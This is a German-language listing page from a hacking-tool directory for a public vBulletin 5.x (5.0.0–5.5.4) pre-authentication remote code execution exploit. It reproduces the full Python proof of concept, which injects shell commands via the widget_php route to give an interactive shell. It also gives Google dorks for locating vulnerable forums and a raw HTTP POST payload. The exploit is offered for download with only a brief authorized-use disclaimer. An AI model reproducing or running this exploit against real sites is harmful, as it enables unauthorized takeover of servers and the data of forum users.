Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
vBulletin-5.x-0day-pre-auth-RCE-exploit — Pre-Authentifizierungs-Exploit zur Remote-Codeausführung für vBulletin 5.x (Versionen 5.0.0 bis 5.5.4). Stellt über das widget_php-Widget eine Shell bereit. Nur für autorisierte Sicherheitstests verwenden. | Kitploit
Tools/GitHubGitHub/ianxtianxt/vbulletin-5.x-0day-pre-auth-rce-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubianxtianxt/vbulletin-5.x-0day-pre-auth-rce-exploit

vBulletin-5.x-0day-pre-auth-RCE-exploit

Pre-Authentifizierungs-Exploit zur Remote-Codeausführung für vBulletin 5.x (Versionen 5.0.0 bis 5.5.4). Stellt über das widget_php-Widget eine Shell bereit. Nur für autorisierte Sicherheitstests verwenden.

Repository anzeigen
41vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

vBulletin-5.x-0day-pre-auth-RCE-exploit

Betroffene Versionen: vBulletin 5.0.0 bis 5.5.4

PoC wie folgt:

#!/usr/bin/python

vBulletin 5.x 0day pre-auth RCE exploit

This should work on all versions from 5.0.0 till 5.5.4

Google Dorks:

- site:*.vbulletin.net

- "Powered by vBulletin Version 5.5.4"

import requests

import sys

if len(sys.argv) != 2:

sys.exit("Usage: %s " % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:

root@kitploit:~
try: cmd = raw_input("vBulletin$ ") params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;" r = requests.post(url = sys.argv[1], data = params) if r.status_code == 200: print r.text else: sys.exit("Exploit failed! :(") except KeyboardInterrupt: sys.exit(" Closing shell...") except Exception, e: sys.exit(str(e))

POST / HTTP/1.1

Host: *

Content-Type: application/x-www-form-urlencoded

Content-Length: 108

routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27ifconfig%27%29%3B+exit%3B

Tool herunterladen